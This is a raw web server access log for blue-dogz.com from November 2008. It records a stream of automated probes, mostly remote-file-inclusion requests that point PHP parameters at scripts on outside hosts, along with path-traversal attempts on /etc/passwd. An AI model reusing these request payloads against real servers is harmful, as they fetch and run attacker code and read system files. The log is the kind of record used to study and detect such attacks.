98.129.21.210 - - [21/Nov/2008:06:24:17 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:17 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:17 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:17 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:17 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:19 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:19 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
98.129.21.210 - - [21/Nov/2008:06:24:19 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
121.126.12.7 - - [21/Nov/2008:06:24:21 -0800] "GET /logs/access.log%20/skin/zero_vote/ask_password.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
69.73.133.74 - - [21/Nov/2008:06:25:58 -0800] "GET /logs/access.log/modules/admin/vw_usr_roles.php?baseDir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "blue-dogz.com"
69.73.133.74 - - [21/Nov/2008:06:25:58 -0800] "GET /logs/modules/admin/vw_usr_roles.php?baseDir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "blue-dogz.com"
69.73.133.74 - - [21/Nov/2008:06:25:58 -0800] "GET /modules/admin/vw_usr_roles.php?baseDir=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:26:36 -0800] "GET /ch_readalso.php?read_xml_include=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:26:36 -0800] "GET /logs//ch_readalso.php?read_xml_include=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
70.38.12.204 - - [21/Nov/2008:06:30:14 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
70.38.12.204 - - [21/Nov/2008:06:30:14 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
70.38.12.204 - - [21/Nov/2008:06:30:15 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:06:31:00 -0800] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:06:31:00 -0800] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
66.147.239.184 - - [21/Nov/2008:06:40:56 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "blue-dogz.com"
66.147.239.184 - - [21/Nov/2008:06:40:56 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "blue-dogz.com"
66.147.239.184 - - [21/Nov/2008:06:40:56 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:49:40 -0800] "GET /logs/inc/TabStrip.php?function=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:49:40 -0800] "GET /inc/TabStrip.php?function=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:06:54:40 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:06:54:40 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:06:55:37 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:06:56:10 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:06:56:10 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:06:57:23 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:06:57:28 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:58:38 -0800] "GET /logs//config.inc.php?config%5broot_dir%5d=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
87.66.0.221 - - [21/Nov/2008:06:58:38 -0800] "GET /config.inc.php?config%5broot_dir%5d=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:06:59:23 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
89.111.176.11 - - [21/Nov/2008:07:00:02 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:07:00:47 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:07:00:48 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:07:00:48 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:07:02:06 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:07:02:07 -0800] "GET /include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
89.186.1.54 - - [21/Nov/2008:07:02:07 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:03:20 -0800] "GET /config/dbutil.bck.php?confdir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:03:20 -0800] "GET /logs//config/dbutil.bck.php?confdir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:05:36 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:05:36 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:05:37 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:07:00 -0800] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:07:00 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:07:00 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
87.106.245.44 - - [21/Nov/2008:07:09:40 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.106.245.44 - - [21/Nov/2008:07:09:40 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
87.106.245.44 - - [21/Nov/2008:07:09:41 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
89.111.176.11 - - [21/Nov/2008:07:09:53 -0800] "GET /logs/scripts.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
89.111.176.11 - - [21/Nov/2008:07:09:53 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
89.111.176.11 - - [21/Nov/2008:07:09:54 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
89.107.64.176 - - [21/Nov/2008:07:10:48 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "blue-dogz.com"
89.107.64.176 - - [21/Nov/2008:07:10:48 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "blue-dogz.com"
89.107.64.176 - - [21/Nov/2008:07:10:48 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "blue-dogz.com"
70.84.182.98 - - [21/Nov/2008:07:12:29 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "blue-dogz.com"
70.84.182.98 - - [21/Nov/2008:07:12:33 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "blue-dogz.com"
70.84.182.98 - - [21/Nov/2008:07:12:39 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "blue-dogz.com"
85.158.181.12 - - [21/Nov/2008:07:14:36 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
85.158.181.12 - - [21/Nov/2008:07:14:36 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
85.158.181.12 - - [21/Nov/2008:07:14:37 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mozac.edu.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:15:34 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:15:40 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:15:50 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:07:25:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:07:25:10 -0800] "GET /skin/zero_vote/error.php?dir=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "blue-dogz.com"
89.108.66.227 - - [21/Nov/2008:07:27:39 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
89.108.66.227 - - [21/Nov/2008:07:27:40 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
89.108.66.227 - - [21/Nov/2008:07:27:40 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:29:24 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:29:24 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:29:24 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
89.108.66.227 - - [21/Nov/2008:07:32:19 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:33:26 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:33:26 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:33:26 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
24.143.139.77 - - [21/Nov/2008:07:33:41 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
195.234.128.50 - - [21/Nov/2008:07:34:14 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.jjran.com/board/skin/zero_vote/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "blue-dogz.com"
195.234.128.50 - - [21/Nov/2008:07:34:14 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.jjran.com/board/skin/zero_vote/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "blue-dogz.com"
195.234.128.50 - - [21/Nov/2008:07:34:14 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.jjran.com/board/skin/zero_vote/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:37:41 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:37:41 -0800] "GET /ashnews.php?pathtoashnews=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "blue-dogz.com"
211.76.137.5 - - [21/Nov/2008:07:37:45 -0800] "GET /logs//ashnews.php?pathtoashnews=http://rfi.at.ua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "blue-dogz.com"
89.108.67.208 - - [21/Nov/2008:07:39:34 -0800] "GET /login.php?dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
89.108.67.208 - - [21/Nov/2008:07:40:30 -0800] "GET /logs/access.log//login.php?dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
89.108.67.208 - - [21/Nov/2008:07:40:31 -0800] "GET /login.php?dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
89.108.67.208 - - [21/Nov/2008:07:40:31 -0800] "GET /logs//login.php?dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "blue-dogz.com"
216.127.66.127 - - [21/Nov/2008:07:43:04 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/mod_ssl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "blue-dogz.com"
212.103.152.139 - - [21/Nov/2008:07:54:22 -0800] "GET /include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "blue-dogz.com"
212.103.152.139 - - [21/Nov/2008:07:54:22 -0800] "GET /logs/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "blue-dogz.com"
212.103.152.139 - - [21/Nov/2008:07:54:22 -0800] "GET /include/logout.php?PSA_PATH=http://oddesign.ca/modules/pro/ba.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "blue-dogz.com"
212.103.152.139 - - [21/Nov/2008:07:54:22 -0800] "GET /logs/include/logout.php?PSA_PATH=http://oddesign.ca/modules/pro/ba.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:07:54:33 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.geocities.com/rinaputria/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:07:54:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/rinaputria/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
72.14.199.117 - - [21/Nov/2008:08:07:57 -0800] "GET /atom.xml HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=10272581456949589261)" "blue-dogz.com"
195.12.53.176 - - [21/Nov/2008:08:19:55 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:08:20:00 -0800] "GET /logs/scripts.log//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:08:20:04 -0800] "GET /logs/scripts.log//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:08:20:05 -0800] "GET /logs//?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 943 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:08:20:06 -0800] "GET /?mosConfig_absolute_path=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 200 6718 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:08:20:06 -0800] "GET /?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 6718 "-" "libwww-perl/5.814" "blue-dogz.com"
74.52.107.130 - - [21/Nov/2008:08:20:06 -0800] "GET /logs//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 943 "-" "libwww-perl/5.814" "blue-dogz.com"
88.116.96.124 - - [21/Nov/2008:08:22:22 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
88.116.96.124 - - [21/Nov/2008:08:22:22 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
88.116.96.124 - - [21/Nov/2008:08:22:22 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.magnoliasouth.com//include/scripts/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:08:28:34 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:08:28:35 -0800] "GET /skin/zero_vote/error.php?dir=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
121.170.11.100 - - [21/Nov/2008:08:28:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "blue-dogz.com"
